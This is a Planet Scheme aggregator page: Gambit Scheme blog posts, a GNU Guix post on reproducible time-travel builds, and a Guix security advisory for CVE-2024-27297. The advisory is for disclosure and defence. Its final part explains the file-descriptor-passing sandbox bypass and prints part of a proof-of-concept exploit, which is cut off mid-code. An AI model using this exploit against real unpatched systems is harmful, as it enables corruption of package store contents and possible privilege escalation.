Planet Scheme

Monday, March 18, 2024

Phil Dawes

The point of macros

Pascal Costanza nails the point of macros.

(and illustrates why lispers actually like lisp's strange syntax so much)

Monday, March 18, 2024

And another new programming language

Last year I embarked on somwhat of a journey to find a better language for my home projects after getting a bit frustrated by python's lack of blocks and general cruftyness. After a couple of months of trying various different things I settled on Gambit Scheme for my spare-time data indexing project. A minimal core language with uniform syntax and macros. Lots of potentual for adapting and building language features that make sense to me. Sorted.

Then last week I got round to reading Richard Jones's minimal forth code. A language compiler and runtime in a couple of pages of well documented X86 assembler; small enough to read and understand the whole system in a bus journey.

Like Scheme, Forth has the ability to construct new language features, allowing user code to get between the parser and the evaluator to modify the language itself. Also, like Scheme, it has a uniform syntax - words separated by spaces, which makes re-writing code on the fly practical. Both these features mean that a fully fledged programming environment can be bootstrapped up from a minimal core. And the hook is: that minimal core is so much smaller for Forth than it is for Scheme.

One thing lead to another and I got interested in stack languages. Now I'm looking at Factor and wondering...

Factor has ticks in all the right boxes: minimal core, machine code compiler, macros, continuations, lightweight threads and message passing concurrency. It's also the tersest language I've seen - code to do something always seems a fraction of the size I expect it to be. On the other hand it's so radically different to anything else I've programmed in and it makes my head hurt. Could it be a contender to knock Scheme off the top spot?

Monday, March 18, 2024

Some hardcore Gambit-C features

Somebody asked me about gambit-c the other day, and why I was using that as opposed to some other language or runtime for my own-time coding stuff. Despite the scheme language being all cool, the thing that really made his eyes light up was the C features in gambit (it is called gambit-c for a reason). Here's some cool stuff you can do with gambit:

  1. Scheme compiles to native machine code
  2. The gambit scheme compiler compiles to C, which gcc then compiles to shared libraries or executables. The gsc command wraps this whole process, so you do a 'gsc < myschemefile>' which drops a shared library out of the other end. The (load) procedure in gambit will import either interpreted scheme code or compiled object files into the process, so you're good to go. In addition, the gsc compiler can also be run as an interactive interpreter (gsc -i) which acts just like the normal gambit scheme repl interpreter except you also have access to the compiler from your code. E.g. As well as dropping interpreted scheme code into the repl I can also compile a file and load it into the running repl process without dropping to the command line - cool!.
  3. You can embed C code directly into gambit scheme files.
  4. (c-include) lets you paste C code into your scheme, and (c-lambda) lets you define lambdas in C. This is really sweet. I thought the python C api was good, but because you have to write your c stuff in seperate files it always requires some sort of make/build system, and that's always been just too much of a barrier for me to use it day-to-day. With gambit you can just switch in a few lines of C into your performance hotspot and you're good to go. This also gives you trivial access to C libraries and low-level stuff - e.g. I use it for mmapped files. Having the C in the same file as scheme means the GCC compiler can optimize and inline C code into compiled scheme and vice-versa. The other advantage of this approach is that the gambit-c environment pretty much requires you to have a C compiler in the mix, so as a developer I can rely on it being there when distributing source to other developers, pasting code into emails etc..
  5. You can compile and load C into a running scheme process
  6. Actually this is just a mix of (1) and (2), but it's really cool when you think about what's going on. Make an update to your C code and dynamically re-load it into your running process. I have an emacs keybinding which executes a 'cload' function in the repl:
    
    (define (cload f)
      (compile-file f)
      (load f))
    
    
    I.e. edit the C code, whack the button and it's in the repl process. This keeps the dev loop really tight even when writing C.
  7. You can compile the whole thing into a native binary.
  8. This is especially cool and important when you consider that gambit-c isn't currently a popular runtime. It means you can distribute native binaries of your app for windows and mac users so that they can try your app without worrying about dependencies.

(*) N.B. although uncommon outside the lisp world, these compilation features are actually pretty common in lisp/scheme implementations. E.g. I think chicken, bigloo and SBCL provide simililar things.

Monday, March 18, 2024

Getting the hang of the lisp style

Finally, it's starting to feel like I'm getting the hang of the lisp style. The key for me seems to be in re-reading the contents of srfi-1 every time I think I need a loop.

Monday, March 18, 2024

Refactoring and the Repl

I'm still perservering with Gambit scheme, and progressing pretty slowly it has to be said. The first thing I've been missing is the lack of refactoring tools for scheme.

I wrote the basic python refactoring functionality in bicyclerepairman a long while ago, and having it as part of my daily toolset has strongly influenced the way I program. For example, I tend to follow the 'bash out some code and then clean it up' style of development. In particular, I have a habit of naming variables and functions badly and then renaming them later as I code.

So my initial thought is: no problem - I'll just knock up a bicyclerepairman for scheme! The problem is that I'm not quite sure how to do automated refactoring with a repl. You see Python has no real repl culture (sure it has a repl, but nobody uses it except for trying out simple expressions). People tend to run their program/unittests from scratch each iteration, which means the entire environment gets re-evaluated on each run.

The challenge with running a repl while you develop is keeping it in sync with your refactored code: E.g. if I rename a function that's used in multiple places, that results in lots of code that needs re-evaluating. Can this be done automatically (e.g. could it be made to work by just re-eval'ing files?). Hmm.. I think I need to talk to somebody with a lot more scheme experience than I have. Unfortunately I don't actually know any experienced schemers, especially not in London or Birmingham; maybe somebody from lshift can help?

Monday, March 18, 2024

Scheme is love

I've been battling again with Scheme recently. Having spent the last couple of months playing with various languages, I've come to the conclusion that scheme is the only one that has any real possibility of becoming my next 'general purpose language'. Python held that crown for many years, but its lack of blocks and concurrency caused me to start looking elsewhere and now I'm spoilt.

So, to Scheme. I've not found another language that can offer:

  • functional programming
  • message-passing concurrency (see termite)
  • macros
  • continuations
  • terse syntax
  • hardly any language cludges

...and as somebody who programs for fun in his spare time, these things really do matter to me. The biggest obstacle to full enlightment is the s-expression aesthetic: To my algol-shaped brain that lisp syntax just looks so damn ugly!

Anyway, I'm finding that the most enjoyable and self-affirming way to develop some scheme skills is (ironically) to re-read Peter Seibel's 'Practical Common Lisp' book with scheme glasses on. Now if there's anyone going to convince me that lisp syntax isn't just a grotty heap of parentheses, it's going to be Peter. His book just radiates lisp-love, and you can't help but be hooked. It says 'Look! You fools! Just look what you're missing!'. I've been translating various examples into scheme, just to test the water.

Monday, March 18, 2024

Scheme development environment

I recently had my work laptop nicked while I was in paris, so I've had to reconstruct my linux development environment on another laptop. That reminded me that I intended to document this stuff since I had to dig around a bit for it when I first picked up scheme a few months ago.

Things I use:

  • Gambit scheme
  • The main reason I've stuck with this is termite, but I've also found the mailing list friendly and helpful (and full of much bigger brains than mine). Gambit can also compile static C binaries that run on windows - that's important if you're going to write code in an esoteric environment like scheme. It also has a decent FFI which allows you to embed C code in with the scheme - tres cool, especially when you're writing performance critical code.
  • Emacs
  • You have to use this if you're doing lisp development. Personally I use emacs for development in any language, including Java. Steve Yegge wrote: "Emacs is to Eclipse as a light saber is to a blaster - but a blaster is a lot easier for anyone to pick up and use.". Nuff said. I tend to have two frames open - one with the gambit repl in it and the other to do the actually coding. For people that aren't in the know, the lisp development experience is slightly different to most languages: you basically have a process running (called the REPL) and inject blocks of code into it. This makes the development cycle turnaround super-fast and it becomes a bit frustrating when you go back to waiting for compile cycles in other languages. The various emacs scheme modes provide key presses for sending various regions of code to the repl, the most useful being the current definition (i.e. function) and the last expression.
  • Quack.el
  • Quack has lots of features that make editing scheme much easier. My favourite is automatically converting the word 'lambda' into a single greek lambda character (a-la DR scheme). In addition to making the code smaller, having greek letters all over the place makes me feel pretty hard-core (which is obviously very important).
  • E-tags
  • Emacs tags isn't a patch on what bicyclerepairman provides when I'm writing python, but it does enough to make navigating code relatively hassle free, plus it works with every language you can think of. Basically it parses files and creates an index of all the definitions so that you can jump to the definition of a symbol and back in a single key chord.
  • GNU Info
  • It's handy to have all the documentation in info format because then you can use emacs to jump to the apropriate docs when you need them without having to switch to browser etc.. E.g. this function maps [f1] to jump to the r5rs docs for whatever the cursor is currently pointing at. (with thanks to Bill Clementson for this).
    (add-hook 'scheme-mode-hook
          (lambda ()
            (define-key scheme-mode-map [f1]
              '(lambda ()
             (interactive)
             (ignore-errors
               (let ((symbol (thing-at-point 'symbol)))
                 (info "(r5rs)")
                 (Info-index symbol)))))))
    
    (N.B. quack has a feature to auto-open web based docs into emacs while you're coding, but I work offline so much that I don't use this much)
  • A unit testing framework.
  • I didn't really get on with any of the ones I tried, so I wrote a simple DSL myself (took about half a day after I'd figured out how syntax-case macros work). Ideally I want to end up using something like Nat's Protest system, which chucks out documentation as a side effect of testing. A Scheme DSL should be a good fit for this style, since you can name tests using strings rather than having to document with function names. For the time being though it provides just enough to get me testing (and also served to teach me a few things about macros, which is good.)

Is there anything missing?

Monday, March 18, 2024

A poor man’s scheme profiler

Gambit scheme lacks a profiler that can profile scheme with embedded C code. (There's statprof, but unfortunately it doesn't profile embeded C). I needed to do this pretty desperately for my triple indexing stuff so I've written a simple macro which takes wall clock timings of functions and accumulates them.

You replace 'define' with 'define-timed' in the functions you want profiled, and then the time spent in each function is accumulated in a global hash table. It's not pretty, but it's simple.

The macro needs some supporting code (which I keep in a seperate module so that it can be compiled in order to minimise overhead). :


(define *timerhash* (make-table))

;;; call this before running the code
(define (reset-timer) (set! *timerhash* (make-table)))


;;; adds the time spent in the thunk to an entry in the hashtable
(define (accum-time name thunk)
  (let* ((timebefore (real-time))
         (res (thunk)))
    (table-set! *timerhash* name 
                (let ((current (table-ref *timerhash* name '(0 0))))
                  (list (+ (car current) (- (real-time) timebefore))
                        (+ (cadr current) 1))))
    res))

;;; call this afterwards to get the times
(define (get-times)
  (map (lambda (e) (list (first e) 
                    (* 1000 (second e))
                    (third e)))

       (sort-list (table->list *timerhash*)
                  (lambda (a b) (> (second a)
                              (second b))))))

And here's the macro. It basically just wraps the function body in a call to 'accum-time':


(define-syntax define-timed
  (syntax-rules ()
    ((define-timed (name . args) body ...)
     (define (name . args)
       (accum-time 'name (lambda ()
                           body ...))))))

Here's some example output. The first number is the accumulated milliseconds spent in the function, and the second is the number of times it was called.


((handle-query-clause 2182.3294162750244 8)
 (do-substring-search-query 1678.9898872375488 1)
 (run-query 1678.9379119873047 1)
 (main 1678.929090499878 1)
 (handle-substr-search 705.5349349975586 2)
 (convert-ids-to-symbols 400.3608226776123 1)
 (handle-s_o-clause 192.81506538391113 2)
 (lookup-o->s 192.52514839172363 2)
 (lookup-2-lvl-index 192.48294830322266 2)
 (join 163.8491153717041 8)
 (hash-join 163.6500358581543 5)
 (fetch-int32-results 118.37220191955566 655)
 (project 100.7072925567627 3)
 (concat 77.42834091186523 11793)
 (handle-p->so-clause 55.348873138427734 2)
 (bounds-matching-1intersect 51.54275894165039 2)
 (lookup-p->2-lvl-index 50.98700523376465 2)
 (search-32-32-index 42.65856742858887 94)
 (cells-at-positions 35.561561584472656 11697)
 (fetch-32-32-results 1.171112060546875 94)
 (extract-column .2582073211669922 4)
 (get-join-columns .05888938903808594 5)
 (text-search-to-structured-query .032901763916015625 1)
 (columns .0324249267578125 10)
 (column-position .031232833862304688 8)
 (rows .011920928955078125 4))

Hmmm.. I really need to get something to html pretty print the scheme code.

Monday, March 18, 2024

A simple scheme unittest DSL

One of the first things I wrote when I was in the 'nesting'* phase of learning gambit scheme was a unittest DSL. Part of this was that I wanted an excuse to use r5rs syntax-rules macros, but the real motivation was that I'd been seduced by the idea of using tests for documentation ala Nat Pryce's 'Protest'. Here's what I came up with: (example):


(define-tests bus-tests

  (drive-to-next-stop        ; name of fn/class/symbol being tested
    ("takes bus to next stop"
      (drive-to-next-stop bus)
      (assert-equal 'next-stop (bus 'position)))
    ("doesn't stop off at chipshop on the way"
      ; test code to detect chipshop hasn't been stopped at
      ))

  (pick-up-passengers
    ("picks up passengers from the bus stop"
      test code )
    ("doesn't leave passengers at the stop"
      test code )
    ("waits for old lady running to the stop"
      test code )))

The point is that it's easy to write some lisp to traverse this code and generate documentation from it.

I found when using protest in python that the documentation angle reinforced some healthy habits: When you write tests you naturally think 'how would this look to another person?' 'how can I document the behaviour of this?' which encourages more complete testing. Also when you look at generated documentation it's easy to see which bits you aren't testing because the documentation is missing (which then encourages you to write more tests).

The implementation is a bit clunky and makes use of gambit exceptions as a way of terminating tests early because of assert failures (which is a bit rubbish). What probably should be happening is that the outer macro should be re-writing each assert as an 'if' or something to conditionally execute the rest of the test. (which would portable to other scheme implementations) To be honest I knocked this up as fast as I could so that I could move onto writing other things (I'm developing a data aggregation and indexing tool), but the point of this post is more to convey the idea than the implementation.

That said, the crufty (currently gambit specific) implementation is here - hope this is interesting/useful to somebody.

* nesting as in 'building a nest'

Monday, March 18, 2024

Gambit-C namespaces

One of the first issues I had when evaluating scheme as a possible replacement for Python as my hobby language was its apparent lack of module/library/namespace system. How do people possibly build big programs? I wondered.

Now it turns out most (all?) scheme implementations have features to deal with modules and libraries. Gambit's is particularly nebulous in that it doesn't appear to be documented anywhere. Anyway, here's how it appears to work. I'm sure somebody will correct me if I've got something wrong:

Gambit has the 'namespace' primitive, with which you can declare that certain definitions belong in certain namespaces. Here's an example:


> (namespace ("f#" foo) ("b#" bar baz))

This means (AFAICS): "any further use/definition of the term 'foo' will reference the f# namespace and any use of bah/baz will reference the b# namespace".

e.g.


> (namespace ("f#" foo) ("b#" bar baz))

> (define (foo) "I am foo")  ; defines f#foo

> (foo)
"I am foo"

> (f#foo)
"I am foo"

> (define (bar) "I am bar")

> (b#bar)
"I am bar"

This is cool because it allows you to retroactively fit namespaces to scheme code loaded from other files. E.g. If mod1.scm and mod2.scm both defined a procedure 'foo', you could use namespaces to allow both to be used in the same environment thus:


> (namespace ("m1#" foo))
> (load "mod1")    ; contains: (define (foo) "I am mod1's foo")

> (namespace ("m2#" foo))
> (load "mod2")    ; contains: (define (foo) "I am mod2's foo")

> (m1#foo)
"I am mod1's foo"

> (m2#foo)
"I am mod2's foo"

Job done. Now I haven't really used gambit namespaces much, so I not in a position to provide a good comparison with other approaches, however the feature does seem in keeping with the rest of the scheme language. By that I mean rather than a large set of fully blown rich language features you get a small bunch of simple but very extensible primitives with which to build your own language.

An good example of building a big system over these small primitives is Christian Jaeger's chjmodule library where he has used namespaces along with 'load' and 'compile-file' (and of course macros) to build a more industrial strength module system. This includes an 'import' keyword that loads from a search path and a procedure to recursively compile and import modules. Some example code from the README:



$ gsc -i -e '(load "chjmodule")' -

> (import 'srfi-1)
> fold
#
> (fold + 0 '(1 2 3))
6
> (build-recursively/import 'regex-case)
            ; recompiles regex.scm (a dependency) if necessary,
            ; then (re)compiles regex-case.scm if necessary and imports it.
> (regex-case "http://www.xxx.yy" ("http://(.+)" (_ url) url) (else url))
"www.xxx.yy"
> *module-search-path* 
("."
 "mod"
 "gambit"
 "~/gambit"
 "~~"
 "..")

Sweet. I'm guessing it'll also be possible to build the r6rs library syntax in gambit scheme the same way.

Monday, March 18, 2024

Wednesday, March 13, 2024

GNU Guix

Adventures on the quest for long-term reproducible deployment

Rebuilding software five years later, how hard can it be? It can’t be that hard, especially when you pride yourself on having a tool that can travel in time and that does a good job at ensuring reproducible builds, right?

In hindsight, we can tell you: it’s more challenging than it seems. Users attempting to travel 5 years back with guix time-machine are (or were) unavoidably going to hit bumps on the road—a real problem because that’s one of the use cases Guix aims to support well, in particular in a reproducible research context.

In this post, we look at some of the challenges we face while traveling back, how we are overcoming them, and open issues.

The vision

First of all, one clarification: Guix aims to support time travel, but we’re talking of a time scale measured in years, not in decades. We know all too well that this is already very ambitious—it’s something that probably nobody except Nix and Guix are even trying. More importantly, software deployment at the scale of decades calls for very different, more radical techniques; it’s the work of archivists.

Concretely, Guix 1.0.0 was released in 2019 and our goal is to allow users to travel as far back as 1.0.0 and redeploy software from there, as in this example:

$ guix time-machine -q --commit=v1.0.0 -- \
     environment --ad-hoc python2 -- python
> guile: warning: failed to install locale
Python 2.7.15 (default, Jan  1 1970, 00:00:01) 
[GCC 5.5.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>>

(The command above uses guix environment, the predecessor of guix shell, which didn’t exist back then.) It’s only 5 years ago but it’s pretty much remote history on the scale of software evolution—in this case, that history comprises major changes in Guix itself and in Guile. How well does such a command work? Well, it depends.

The project has two build farms; bordeaux.guix.gnu.org has been keeping substitutes (pre-built binaries) of everything it built since roughly 2021, while ci.guix.gnu.org keeps substitutes for roughly two years, but there is currently no guarantee on the duration substitutes may be retained. Time traveling to a period where substitutes are available is fine: you end up downloading lots of binaries, but that’s OK, you rather quickly have your software environment at hand.

Bumps on the build road

Things get more complicated when targeting a period in time for which substitutes are no longer available, as was the case for v1.0.0 above. (And really, we should assume that substitutes won’t remain available forever: fellow NixOS hackers recently had to seriously consider trimming their 20-year-long history of substitutes because the costs are not sustainable.)

Apart from the long build times, the first problem that arises in the absence of substitutes is source code unavailability. I’ll spare you the details for this post—that problem alone would deserve a book. Suffice to say that we’re lucky that we started working on integrating Guix with Software Heritage years ago, and that there has been great progress over the last couple of years to get closer to full package source code archival (more precisely: 94% of the source code of packages available in Guix in January 2024 is archived, versus 72% of the packages available in May 2019).

So what happens when you run the time-machine command above? It brings you to May 2019, a time for which none of the official build farms had substitutes until a few days ago. Ideally, thanks to isolated build environments, you’d build things for hours or days, and in the end all those binaries will be here just as they were 5 years ago. In practice though, there are several problems that isolation as currently implemented does not address.

Screenshot of movie “Safety Last!” with Harold Lloyd hanging from a clock on a building’s façade.

Among those, the most frequent problem is time traps: software build processes that fail after a certain date (these are also referred to as “time bombs” but we’ve had enough of these and would rather call for a ceasefire). This plagues a handful of packages out of almost 30,000 but unfortunately we’re talking about packages deep in the dependency graph. Here are some examples:

  • OpenSSL unit tests fail after a certain date because some of the X.509 certificates they use have expired.
  • GnuTLS had similar issues; newer versions rely on datefudge to fake the date while running the tests and thus avoid that problem altogether.
  • Python 2.7, found in Guix 1.0.0, also had that problem with its TLS-related tests.
  • OpenJDK would fail to build at some point with this interesting message: Error: time is more than 10 years from present: 1388527200000 (the build system would consider that its data about currencies is likely outdated after 10 years).
  • Libgit2, a dependency of Guix, had (has?) a time-dependent tests.
  • MariaDB tests started failing in 2019.

Someone traveling to v1.0.0 will hit several of these, preventing guix time-machine from completing. A serious bummer, especially to those who’ve come to Guix from the perspective of making their research workflow reproducible.

Time traps are the main road block, but there’s more! In rare cases, there’s software influenced by kernel details not controlled by the build daemon:

In a handful of cases, but important ones, builds might fail when performed on certain CPUs. We’re aware of at least two cases:

Neither time traps nor those obscure hardware-related issues can be avoided with the isolation mechanism currently used by the build daemon. This harms time traveling when substitutes are unavailable. Giving up is not in the ethos of this project though.

Where to go from here?

There are really two open questions here:

  1. How can we tell which packages needs to be “fixed”, and how: building at a specific date, on a specific CPU?
  2. How can keep those aspects of the build environment (time, CPU variant) under control?

Let’s start with #2. Before looking for a solution, it’s worth remembering where we come from. The build daemon runs build processes with a separate root file system, under dedicated user IDs, and in separate Linux namespaces, thereby minimizing interference with the rest of the system and ensuring a well-defined build environment. This technique was implemented by Eelco Dolstra for Nix in 2007 (with namespace support added in 2012), at a time where the word container had to do with boats and before “Docker” became the name of a software tool. In short, the approach consists in controlling the build environment in every detail (it’s at odds with the strategy that consists in achieving reproducible builds in spite of high build environment variability). That these are mere processes with a bunch of bind mounts makes this approach inexpensive and appealing.

Realizing we’d also want to control the build environment’s date, we naturally turn to Linux namespaces to address that—Dolstra, Löh, and Pierron already suggested something along these lines in the conclusion of their 2010 Journal of Functional Programming paper. Turns out there is now a time namespace. Unfortunately it’s limited to CLOCK_MONOTONIC and CLOCK_BOOTTIME clocks; the manual page states:

Note that time namespaces do not virtualize the CLOCK_REALTIME clock. Virtualization of this clock was avoided for reasons of complexity and overhead within the kernel.

I hear you say: What about datefudge and libfaketime? These rely on the LD_PRELOAD environment variable to trick the dynamic linker into pre-loading a library that provides symbols such as gettimeofday and clock_gettime. This is a fine approach in some cases, but it’s too fragile and too intrusive when targeting arbitrary build processes.

That leaves us with essentially one viable option: virtual machines (VMs). The full-system QEMU lets you specify the initial real-time clock of the VM with the -rtc flag, which is exactly what we need (“user-land” QEMU such as qemu-x86_64 does not support it). And of course, it lets you specify the CPU model to emulate.

News from the past

Now, the question is: where does the VM fit? The author considered writing a package transformation that would change a package such that it’s built in a well-defined VM. However, that wouldn’t really help: this option didn’t exist in past revisions, and it would lead to a different build anyway from the perspective of the daemon—a different derivation.

The best strategy appeared to be offloading: the build daemon can offload builds to different machines over SSH, we just need to let it send builds to a suitably-configured VM. To do that, we can reuse some of the machinery initially developed for childhurds that takes care of setting up offloading to the VM: creating substitute signing keys and SSH keys, exchanging secret key material between the host and the guest, and so on.

The end result is a service for Guix System users that can be configured in a few lines:

(use-modules (gnu services virtualization))

(operating-system
  ;; …
  (services (append (list (service virtual-build-machine-service-type))
                    %base-services)))

The default setting above provides a 4-core VM whose initial date is January 2020, emulating a Skylake CPU from that time—the right setup for someone willing to reproduce old binaries. You can check the configuration like this:

$ sudo herd configuration build-vm
CPU: Skylake-Client
number of CPU cores: 4
memory size: 2048 MiB
initial date: Wed Jan 01 00:00:00Z 2020

To enable offloading to that VM, one has to explicitly start it, like so:

$ sudo herd start build-vm

From there on, every native build is offloaded to the VM. The key part is that with almost no configuration, you get everything set up to build packages “in the past”. It’s a Guix System only solution; if you run Guix on another distro, you can set up a similar build VM but you’ll have to go through the cumbersome process that is all taken care of automatically here.

Of course it’s possible to choose different configuration parameters:

(service virtual-build-machine-service-type
         (virtual-build-machine
          (date (make-date 0 0 00 00 01 10 2017 0)) ;further back in time
          (cpu "Westmere")
          (cpu-count 16)
          (memory-size (* 8 1024))
          (auto-start? #t)))

With a build VM with its date set to January 2020, we have been able to rebuild Guix and its dependencies along with a bunch of packages such as emacs-minimal from v1.0.0, overcoming all the time traps and other challenges described earlier. As a side effect, substitutes are now available from ci.guix.gnu.org so you can even try this at home without having to rebuild the world:

$ guix time-machine -q --commit=v1.0.0 -- build emacs-minimal --dry-run
guile: warning: failed to install locale
substitute: updating substitutes from 'https://ci.guix.gnu.org'... 100.0%
38.5 MB would be downloaded:
   /gnu/store/53dnj0gmy5qxa4cbqpzq0fl2gcg55jpk-emacs-minimal-26.2

For the fun of it, we went as far as v0.16.0, released in December 2018:

guix time-machine -q --commit=v0.16.0 -- \
  environment --ad-hoc vim -- vim --version

This is the furthest we can go since channels and the underlying mechanisms that make time travel possible did not exist before that date.

There’s one “interesting” case we stumbled upon in that process: in OpenSSL 1.1.1g (released April 2020 and packaged in December 2020), some of the test certificates are not valid before April 2020, so the build VM needs to have its clock set to May 2020 or thereabouts. Booting the build VM with a different date can be done without reconfiguring the system:

$ sudo herd stop build-vm
$ sudo herd start build-vm -- -rtc base=2020-05-01T00:00:00

The -rtc … flags are passed straight to QEMU, which is handy when exploring workarounds…

The time-travel continuous integration jobset has been set up to check that we can, at any time, travel back to one of the past releases. This at least ensures that Guix itself and its dependencies have substitutes available at ci.guix.gnu.org.

Reproducible research workflows reproduced

Incidentally, this effort rebuilding 5-year-old packages has allowed us to fix embarrassing problems. Software that accompanies research papers that followed our reproducibility guidelines could no longer be deployed, at least not without this clock twiddling effort:

It’s good news that we can now re-deploy these 5-year-old software environments with minimum hassle; it’s bad news that holding this promise took extra effort.

The ability to reproduce the environment of software that accompanies research work should not be considered a mundanity or an exercise that’s “overkill”. The ability to rerun, inspect, and modify software are the natural extension of the scientific method. Without a companion reproducible software environment, research papers are merely the advertisement of scholarship, to paraphrase Jon Claerbout.

The future

The astute reader surely noticed that we didn’t answer question #1 above:

How can we tell which packages needs to be “fixed”, and how: building at a specific date, on a specific CPU?

It’s a fact that Guix so far lacks information about the date, kernel, or CPU model that should be used to build a given package. Derivations purposefully lack that information on the grounds that it cannot be enforced in user land and is rarely necessary—which is true, but “rarely” is not the same as “never”, as we saw. Should we create a catalog of date, CPU, and/or kernel annotations for packages found in past revisions? Should we define, for the long-term, an all-encompassing derivation format? If we did and effectively required virtual build machines, what would that mean from a bootstrapping standpoint?

Here’s another option: build packages in VMs running in the year 2100, say, and on a baseline CPU. We don’t need to require all users to set up a virtual build machine—that would be impractical. It may be enough to set up the project build farms so they build everything that way. This would allow us to catch time traps and year 2038 bugs before they bite.

Before we can do that, the virtual-build-machine service needs to be optimized. Right now, offloading to build VMs is as heavyweight as offloading to a separate physical build machine: data is transferred back and forth over SSH over TCP/IP. The first step will be to run SSH over a paravirtualized transport instead such as AF_VSOCK sockets. Another avenue would be to make /gnu/store in the guest VM an overlay over the host store so that inputs do not need to be transferred and copied.

Until then, happy software (re)deployment!

Acknowledgments

Thanks to Simon Tournier for insightful comments on a previous version of this post.

by Ludovic Courtès at Wednesday, March 13, 2024

Tuesday, March 12, 2024

GNU Guix

Fixed-Output Derivation Sandbox Bypass (CVE-2024-27297)

A security issue has been identified in guix-daemon which allows for fixed-output derivations, such as source code tarballs or Git checkouts, to be corrupted by an unprivileged user. This could also lead to local privilege escalation. This was originally reported to Nix but also affects Guix as we share some underlying code from an older version of Nix for the guix-daemon. Readers only interested in making sure their Guix is up to date and no longer affected by this vulnerability can skip down to the "Upgrading" section.

Vulnerability

The basic idea of the attack is to pass file descriptors through Unix sockets to allow another process to modify the derivation contents. This was first reported to Nix by jade and puckipedia with further details and a proof of concept here. Note that the proof of concept is written for Nix and has been adapted for GNU Guix below. This security advisory is registered as CVE-2024-27297 (details are also available at Nix's GitHub security advisory) and rated "moderate" in severity.

A fixed-output derivation is one where the output hash is known in advance. For instance, to produce a source tarball. The GNU Guix build sandbox purposefully excludes network access (for security and to ensure we can control and reproduce the build environment), but a fixed-output derivation does have network access, for instance to download that source tarball. However, as stated, the hash of output must be known in advance, again for security (we know if the file contents would change) and reproducibility (should always have the same output). The guix-daemon handles the build process and writing the output to the store, as a privileged process.

In the build sandbox for a fixed-output derivation, a file descriptor to its contents could be shared with another process via a Unix socket. This other process, outside of the build sandbox, can then modify the contents written to the store, changing them to something malicious or otherwise corrupting the output. While the output hash has already been determined, these changes would mean a fixed-output derivation could have contents written to the store which do not match the expected hash. This could then be used by the user or other packages as well.

Mitigation

This security issue (tracked here for GNU Guix) has been fixed by two commits by Ludovic Courtès. Users should make sure they have updated to this second commit to be protected from this vulnerability. Upgrade instructions are in the following section.

While several possible mitigation strategies were detailed in the original report, the simplest fix is just copy the derivation output somewhere else, deleting the original, before writing to the store. Any file descriptors will no longer point to the contents which get written to the store, so only the guix-daemon should be able to write to the store, as designed. This is what the Nix project used in their own fix. This does add an additional copy/delete for each file, which may add a performance penalty for derivations with many files.

A proof of concept by Ludovic, adapted from the one in the original Nix report, is available at the end of this post. One can run this code with

guix build -f fixed-output-derivation-corruption.scm -M4

This will output whether the current guix-daemon being used is vulnerable or not. If it is vulnerable, the output will include a line similar to

We managed to corrupt /gnu/store/yls7xkg8k0i0qxab8sv960qsy6a0xcz7-derivation-that-exfiltrates-fd-65f05aca-17261, meaning that YOUR SYSTEM IS VULNERABLE!

The corrupted file can be removed with

guix gc -D /gnu/store/yls7xkg8k0i0qxab8sv960qsy6a0xcz7-derivation-that-exfiltrates-fd*

In general, corrupt files from the store can be found with

guix gc --verify=contents

which will also include any files corrupted by through this vulnerability. Do note that this command can take a long time to complete as it checks every file under /gnu/store, which likely has many files.

Upgrading

Due to the severity of this security advisory, we strongly recommend all users to upgrade their guix-daemon immediately.

For a Guix System the procedure is just reconfiguring the system after a guix pull, either restarting guix-daemon or rebooting. For example,

guix pull
sudo guix system reconfigure /run/current-system/configuration.scm
sudo herd restart guix-daemon

where /run/current-system/configuration.scm is the current system configuration but could, of course, be replaced by a system configuration file of a user's choice.

For Guix running as a package manager on other distributions, one needs to guix pull with sudo, as the guix-daemon runs as root, and restart the guix-daemon service. For example, on a system using systemd to manage services,

sudo --login guix pull
sudo systemctl restart guix-daemon.service

Note that for users with their distro's package of Guix (as opposed to having used the install script) you may need to take other steps or upgrade the Guix package as per other packages on your distro. Please consult the relevant documentation from your distro or contact the package maintainer for additional information or questions.

Conclusion

One of the key features and design principles of GNU Guix is to allow unprivileged package management through a secure and reproducible build environment. While every effort is made to protect the user and system from any malicious actors, it is always possible that there are flaws yet to be discovered, as has happened here. In this case, using the ingredients of how file descriptors and Unix sockets work even in the isolated build environment allowed for a security vulnerability with moderate impact.

Our thanks to jade and puckipedia for the original report, and Picnoir for bringing this to the attention of the GNU Guix security team. And a special thanks to Ludovic Courtès for a prompt fix and proof of concept.

Note that there are current efforts to rewrite the guix-daemon in Guile by Christopher Baines. For more information and the latest news on this front, please refer to the recent blog post and this message on the guix-devel mailing list.

Proof of Concept

Below is code to check if a guix-daemon is vulnerable to this exploit. Save this file as fixed-output-derivation-corruption.scm and run following the instructions above, in "Mitigation." Some further details and example output can be found on issue #69728

;; Checking for CVE-2024-27297.
;; Adapted from <https://hackmd.io/03UGerewRcy3db44JQoWvw>.

(use-modules (guix)
             (guix modules)
             (guix profiles)
             (gnu packages)
             (gnu packages gnupg)
             (gcrypt hash)
             ((rnrs bytevectors) #:select (string->utf8)))

(define (compiled-c-code name source)
  (define build-profile
    (profile (content (specifications->manifest '("gcc-toolchain")))))

  (define build
    (with-extensions (list guile-gcrypt)
     (with-imported-modules (source-module-closure '((guix build utils)
                                                     (guix profiles)))
       #~(begin
           (use-modules (guix build utils)
                        (guix profiles))
           (load-profile #+build-profile)
           (system* "gcc" "-Wall" "-g" "-O2" #+source "-o" #$output)))))

  (computed-file name build))

(define sender-source
  (plain-file "sender.c" "
      #include <sys/socket.h>
      #include <sys/un.h>
      #include <stdlib.h>
      #include <stddef.h>
      #include <stdio.h>
      #include <unistd.h>
      #include <fcntl.h>
      #include <errno.h>

      int main(int argc, char **argv) {
          setvbuf(stdout, NULL, _IOLBF, 0);

          int sock = socket(AF_UNIX, SOCK_STREAM, 0);

          // Set up an abstract domain socket path to connect to.
          struct sockaddr_un data;
          data.sun_family = AF_UNIX;
          data.sun_path[0] = 0;
          strcpy(data.sun_path + 1, \"dihutenosa\");

          // Now try to connect, To ensure we work no matter what order we are
          // executed in, just busyloop here.
          int res = -1;
          while (res < 0) {
              printf(\"attempting connection...\\n\");
              res = connect(sock, (const struct sockaddr *)&data,
                  offsetof(struct sockaddr_un, sun_path)
                    + strlen(\"dihutenosa\")
                    + 1);
              if (res < 0 && errno != ECONNREFUSED) perror(\"connect\");
              if (errno != ECONNREFUSED) break;
              usleep(500000);
          }

          // Write our message header.
          struct msghdr msg = {0};
          msg.msg_control = malloc(128);
          msg.msg_controllen = 128;

          // Write an SCM_RIGHTS message containing the output path.
          struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
          hdr->cmsg_len = CMSG_LEN(sizeof(int));
